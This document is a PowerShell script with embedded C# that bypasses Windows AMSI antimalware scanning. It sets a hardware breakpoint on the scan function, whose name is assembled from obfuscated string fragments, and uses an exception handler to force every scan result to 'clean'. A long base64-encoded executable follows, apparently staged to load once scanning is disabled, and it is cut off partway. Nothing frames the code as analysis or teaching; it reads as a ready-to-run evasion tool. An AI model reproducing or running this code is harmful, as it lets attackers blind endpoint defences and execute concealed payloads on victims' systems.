$HardwareBreakpoint = @"
using System;
using System.Collections.Generic;
using System.Linq.Expressions;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    public class Program
    {
        static string a = "msi";
        static string b = "anB";
        static string c = "ff";
        static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll");
        static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er");
        static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));
        
        public static void SetupBypass()
        {
            WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();
            ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;
            MethodInfo method = typeof(Program).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public);
            IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());
            
            Marshal.StructureToPtr(ctx, pCtx, true);
            bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);
            ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));
            EnableBreakpoint(ctx, pABuF, 0);
            WinAPI.SetThreadContext((IntPtr)(-2), pCtx);
        }
        
        public static long Handler(IntPtr exceptions)
        {
            WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();
            ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));
            WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();
            ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));
            WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();
            ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));
            if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)
            {
                ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);
                IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8)));
                Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);
                ContextRecord.Rip = ReturnAddress;
                ContextRecord.Rsp += 8;
                ContextRecord.Rax = 0;
                
                Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true);
                return WinAPI.EXCEPTION_CONTINUE_EXECUTION;
            }
            else
            {
                return WinAPI.EXCEPTION_CONTINUE_SEARCH;
            }
        }
        public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)
        {
            switch (index)
            {
                case 0:
                    ctx.Dr0 = (ulong)address.ToInt64();
                    break;
                case 1:
                    ctx.Dr1 = (ulong)address.ToInt64();
                    break;
                case 2:
                    ctx.Dr2 = (ulong)address.ToInt64();
                    break;
                case 3:
                    ctx.Dr3 = (ulong)address.ToInt64();
                    break;
            }
            ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);
            ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);
            ctx.Dr6 = 0;
            Marshal.StructureToPtr(ctx, pCtx, true);
        }
        public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)
        {
            ulong mask = (1UL << bits) - 1UL;
            dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
            return dw;
        }
    }
    public class WinAPI
    {
        public const UInt32 DBG_CONTINUE = 0x00010002;
        public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;
        public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;
        public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;
        public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;
        public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;
        public const Int32 EXCEPTION_DEBUG_EVENT = 1;
        public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;
        public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;
        public const Int32 LOAD_DLL_DEBUG_EVENT = 6;
        public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;
        public const Int32 RIP_EVENT = 9;
        public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;
        public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;
        public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;
        public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;
        public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;
        public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;
        public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;
        public const UInt32 DBG_CONTROL_C = 0x40010006;
        public const UInt32 DEBUG_PROCESS = 0x00000001;
        public const UInt32 CREATE_SUSPENDED = 0x00000004;
        public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;
        public const Int32 AMSI_RESULT_CLEAN = 0;
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
        [DllImport("Kernel32.dll")]
        public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);
        [Flags]
        public enum CONTEXT64_FLAGS : uint
        {
            CONTEXT64_AMD64 = 0x100000,
            CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,
            CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,
            CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,
            CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,
            CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,
            CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,
            CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS
        }
        [StructLayout(LayoutKind.Sequential)]
        public struct M128A
        {
            public ulong High;
            public long Low;
            public override string ToString()
            {
                return string.Format("High:{0}, Low:{1}", this.High, this.Low);
            }
        }
        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct XSAVE_FORMAT64
        {
            public ushort ControlWord;
            public ushort StatusWord;
            public byte TagWord;
            public byte Reserved1;
            public ushort ErrorOpcode;
            public uint ErrorOffset;
            public ushort ErrorSelector;
            public ushort Reserved2;
            public uint DataOffset;
            public ushort DataSelector;
            public ushort Reserved3;
            public uint MxCsr;
            public uint MxCsr_Mask;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
            public M128A[] FloatRegisters;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
            public M128A[] XmmRegisters;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
            public byte[] Reserved4;
        }
        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct CONTEXT64
        {
            public ulong P1Home;
            public ulong P2Home;
            public ulong P3Home;
            public ulong P4Home;
            public ulong P5Home;
            public ulong P6Home;
            public CONTEXT64_FLAGS ContextFlags;
            public uint MxCsr;
            public ushort SegCs;
            public ushort SegDs;
            public ushort SegEs;
            public ushort SegFs;
            public ushort SegGs;
            public ushort SegSs;
            public uint EFlags;
            public ulong Dr0;
            public ulong Dr1;
            public ulong Dr2;
            public ulong Dr3;
            public ulong Dr6;
            public ulong Dr7;
            public ulong Rax;
            public ulong Rcx;
            public ulong Rdx;
            public ulong Rbx;
            public ulong Rsp;
            public ulong Rbp;
            public ulong Rsi;
            public ulong Rdi;
            public ulong R8;
            public ulong R9;
            public ulong R10;
            public ulong R11;
            public ulong R12;
            public ulong R13;
            public ulong R14;
            public ulong R15;
            public ulong Rip;
            public XSAVE_FORMAT64 DUMMYUNIONNAME;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
            public M128A[] VectorRegister;
            public ulong VectorControl;
            public ulong DebugControl;
            public ulong LastBranchToRip;
            public ulong LastBranchFromRip;
            public ulong LastExceptionToRip;
            public ulong LastExceptionFromRip;
        }
        [StructLayout(LayoutKind.Sequential)]
        public struct EXCEPTION_RECORD
        {
            public uint ExceptionCode;
            public uint ExceptionFlags;
            public IntPtr ExceptionRecord;
            public IntPtr ExceptionAddress;
            public uint NumberParameters;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;
        }
        [StructLayout(LayoutKind.Sequential)]
        public struct EXCEPTION_POINTERS
        {
            public IntPtr pExceptionRecord;
            public IntPtr pContextRecord;
        }
    }
}
"@

Add-Type -TypeDefinition $HardwareBreakpoint

[Test.Program]::SetupBypass()

$b64 = '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bwUAAAZ7hAAABP4EExAREC23EgUIbwgAAAYJjwgAAAJ7iwAABG5zPwAACoEgAAABEQUoQAAACo0wAAABEwYSAQhvCAAABgmPCAAAAnuOAAAEEgYWCG8IAAAGCY8IAAACe4sAAAQoGwAABgAoJAAACm8lAAAKKAYAACsRDv4GJAAABnMnAAAKKAcAACsoCAAAK28qAAAKEwcRBwhvCAAABgmPCAAAAnuMAAAEKEEAAAoTCBYTCRUoQgAAChIIEgUfQBIJKAwAAAYTChEKExAREC0RAHLlBABwKDYAAAoAFhMPK2sXEwsAEQYWEQgRBo5pKDIAAAoAAN4IJgAWEwsA3gAAEQsTEBEQLREAckMFAHAoNgAACgAWEw8rMxYTDBUoQgAAChIIEgURCRIMKAwAAAYmcrEFAHARDnucAAAEb0MAAAooOAAACgAXEw8rABEPKgAAAAEcAAAAABkAOlMABwEAAAEAAK4BE8EBCAEAAAEeAigDAAAKKhMwAwAcAAAADAAAEQJ7nQAABANvIgAACigjAAAKG28eAAAKCisABioTMAMAHAAAAAwAABECe50AAAQDbyIAAAooIwAAChtvHgAACgorAAYqGzAFAHQEAAATAAARFBMecyUAAAYTHxEfAn2dAAAEAH4YAAAKCgAoJAAACm8lAAAKKAYAACsRHi0RER/+BiYAAAZzJwAAChMeKwARHigHAAArKAgAACtvKgAACgoA3gUmAADeAAAGfhgAAAooRAAAChb+ARMgESAtEQBy3wUAcCg2AAAKADj1AwAAKCQAAApvJQAACigGAAArER/+BicAAAZzJwAACigHAAArKAgAACtvIgAACgsHKAgAAAoMEgAoGQAACh88algoGgAACigbAAAKDRIAKBkAAAoJalgfFGpYKBoAAAooHAAAChMEEgAoGQAACglqWB8YalgTBREFKBoAAAooHAAAChMGFmoTBxEGIAsBAAD+ARb+ARMgESAtDAARBR9galgTBwArCgARBR9walgTBwAIcwIAAAYTCBEIbwQAAAYtDhEIbwcAAAZ7aAAABCsMEQhvBgAABns7AAAEABMJEQhvBAAABi0OEQhvBwAABntpAAAEKwwRCG8GAAAGezwAAAQAEwoRCShFAAAKEwsIFhELEQooMgAACgAWEwwrWgARCygfAAAKEQhvCAAABhEMjwgAAAJ7jAAABG5YKBoAAAoTDQgRCG8IAAAGEQyPCAAAAnuOAAAEEQ0RCG8IAAAGEQyPCAAAAnuNAAAEKDIAAAoAABEMF1gTDBEMEQhvBQAABnuEAAAE/gQTIBEgLZARBygaAAAKKBsAAAoTDhEOFv4BFv4BEyARIC0RAHIpBgBwKDYAAAoAOD0CAAASACgZAAAKEQ5qWB8QalgoGgAACigbAAAKEw8SACgZAAAKEQ5qWB8UalgoGgAACigbAAAKExASACgZAAAKEQ5qWB8YalgoGgAACigbAAAKExESACgZAAAKEQ5qWB8calgoGgAACigbAAAKExISACgZAAAKEQ5qWB8galgoGgAACigbAAAKExMSACgZAAAKEQ5qWB8kalgoGgAACigbAAAKExQSCygZAAAKEQ5qWB8calgoGgAACigbAAAKExUGERIoQQAAChMWGhEQWihCAAAKExcWExgVKEIAAAoSFhIXGhIYKAwAAAYTIBEgLREAcokGAHAoNgAACgA4PwEAABYTDDjxAAAAABIAKBkAAAoSACgZAAAKERNqWBEMGlpqWCgaAAAKKBsAAApqWCgaAAAKKB0AAAoTGRIAKBkAAAoRFGpYEQwYWmpYKBoAAAooHAAAChEPWBMaEgAoGQAAChESalgaERoRD1laalgoGgAACigbAAAKExsSCygZAAAKERVqWBoRGhEPWVpqWCgaAAAKKBsAAAoTHBEbERz+ARMgESAtTAAAEgAoGQAAChESalgaERoRD1laalgoGgAAChEcKEYAAAoAAN4kJgBy8QYAcBEZEhtylAcAcChHAAAKERqMNwAAAShIAAAKAN4DAAAAABEMF1gTDBEMERD+BBMgESA6AP///xELKEkAAAoAFhMdFShCAAAKEhYSFxEYEh0oDAAABiZymgcAcBEfe50AAARvQwAACig4AAAKAAAqARwAAAAAGQA6UwAFAQAAAQAA2gMl/wMkAQAAAR4CKAMAAAoqHgIoAwAACioTMAMAHAAAAAwAABECe54AAAQDbyIAAAooIwAAChtvHgAACgorAAYqEzADABwAAAAMAAARAnugAAAEA28iAAAKKCMAAAobbx4AAAoKKwAGKhswBQB6BAAAFAAAERQTGnMoAAAGExsRGwJ9ngAABAB+GAAACgoAKCQAAApvJQAACigGAAArERotEREb/gYpAAAGcycAAAoTGisAERooBwAAKygIAAArbyoAAAoKAN4FJgAA3gAABn4YAAAKKEQAAAoW/gETHBEcLREActoHAHAoNgAACgA4+wMAAAYGHzwoQQAACigbAAAKKEEAAAofGChBAAAKCwcfPChBAAAKKBsAAAooQgAACgwHFihBAAAKKBwAAAoNfhgAAAoTBAkgCwEAAP4BFv4BExwRHC0WABIBKBkAAAofYGpYKBoAAAoTBAArFAASASgZAAAKH3BqWCgaAAAKEwQAEgAoGQAAChEEH2AoQQAACigbAAAKalgoGgAAChMFEgQoGQAACh9galgaalgoGgAACigbAAAKKEIAAAoTBhEGKEAAAAoW/gEW/gETHBEcLREAciYIAHAoNgAACgA4HQMAABYTBxUoQgAAChIFEgYaEgcoDAAABhMcERwtEQByhggAcCg2AAAKADjxAgAAEgQoGQAACh8MalgoGgAACigbAAAKEwgSACgZAAAKEQQeKEEAAAooGwAACmpYKBoAAAoTCREIHxRbEwoWEws4bgIAABQTF3MqAAAGExgRGBEbfZ8AAAQAEgkoGQAACh8UEQtaalgoGgAAChMMERgSACgZAAAKEQwfDChBAAAKKBsAAApqWCgaAAAKKB0AAApvSgAACn2gAAAEERh7oAAABHLuCABwb0sAAAoW/gETHBEcLQYAOPIBAAASACgZAAAKEgwoGQAACh8QalgoGgAACigbAAAKalgoGgAAChMNEgAoGQAAChEMKBsAAApqWCgaAAAKEw5+GAAAChMPACgkAAAKbyUAAAooBgAAKxEXLRERGP4GKwAABnMnAAAKExcrABEXKAcAACsoCAAAK28qAAAKEw8A3gUmAADeAAARD34YAAAKKEQAAAoW/gETHBEcLQYAOFMBAAAWExA4OAEAAAASDigZAAAKKC8AAAoREFpqWCgaAAAKExESDSgZAAAKKC8AAAoREFpqWCgaAAAKExIREShMAAAKfhgAAAooRAAAChb+ARMcERwtBgA4+QAAABIAKBkAAAoREShMAAAKKB8AAApYKBoAAAoTExETGChBAAAKKB0AAApvSgAAChMUERQoTQAAChb+ARMcERwtBgA4nAAAABEUKBoAAAYW/gETHBEcLQYAOIYAAAARDxEUKAsAAAYTFREVfhgAAAooRAAAChb+ARMcERwtIwByBAkAcBEUERh7oAAABBITcpQHAHAoTgAACihIAAAKACtDERIoTAAAChEVKDoAAAoW/gETHBEcLSsAABESERUoTwAACgAA3hoTFgByuQkAcBEUERZvNwAACihQAAAKAADeAAAAABEQF1gTEBEQID9CDwD+BBMcERw6tv7//wARCxdYEwsRCxEKF1n+BBMcERw6gf3//xYTGRUoQgAAChIFEgYRBxIZKAwAAAYmchcKAHARG3ueAAAEb0MAAAooOAAACgAAKgAAASgAAAAAGQA6UwAFAQAAAQAAhAI7vwIFAQAAAQAA7wMO/QMaNAAAARMwAwCiAAAAFQAAEQByVwoAcCg2AAAKAHKxCgBwKDYAAAoAclcKAHAoNgAACgAajR4AAAEMCBZyQQAAcKIIF3ILCwBwoggYciULAHCiCBlyQwsAcKIIChYLKzcABgeaKBwAAAYmBgeaKB0AAAYABgeackEAAHAoUQAAChb+AQ0JLQsABgeaKB4AAAYAAAAHF1gLBwaOaf4EDQktvygWAAAGAHJXCgBwKDYAAAoAKgAAEzADAEYAAAAWAAARHY0eAAABCgYWcl0LAHCiBhdyhwsAcKIGGHKxCwBwogYZct0LAHCiBhpyBQwAcKIGG3IZDABwogYccjEMAHCiBoCbAAAEKh4CKAMAAAoqAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADQDQAAI34AADwOAABEEAAAI1N0cmluZ3MAAAAAgB4AAEQMAAAjVVMAxCoAABAAAAAjR1VJRAAAANQqAAAwBAAAI0Jsb2IAAAAAAAAAAgAAAVe9owkJDgAAAPolMwAWAAABAAAANwAAABIAAACgAAAAKwAAADAAAABRAAAAAQAAAA4AAAABAAAAAwAAAAoAAAAWAAAAAgAAAAcAAAAHAAAAAgAAAAEAAAADAAAADQAAAAEAAAAIAAAAAAAKAAEAAAAAAAYAIgEbAQYAKQEbAQYAMwEbAQYAOAEbAQYArgGkAQYAzAcbAQYA2QcbAQYAcglSCQYAkglSCQYAwQmkAQYAzAmkAQYA1QmkAQYA4AmkAQYA5wmkAQYAAgqkAQYAFAobAQYAKAqkAQYANQobAQYAOgobAQYAfQpeCgYAlgpeCgYAnwpeCgYA2QpeCgYA7wpeCgYA+gpeCgYADwteCgYAIgteCgYAMAsbAQYANQsbAQYAOwsbAQYAQgsbAQYAUQsbAQYAlQsbAQYArQsbAQoA2gvHCwYABwwbAQYANQxSCQYAXQykAQYAbgwbAQoAdQzHCwoAjwzHCw4Aywy/DAYA8QzWDAYAEg3/DAYASA0bAQYAfQ1eCgYAnw1eCgYAwA0bAQYA1A0bAQYA7w3jDQYAHQ4bAQYALw4bAQYAnQ4bAQYAsw4bAQYAew8bAQAAAAABAAAAAAABAAEAAQAQAB8AAAAFAAEAAQAKARAAKAAAAAkABwAKAAoBEAA5AAAACQAmAAoAC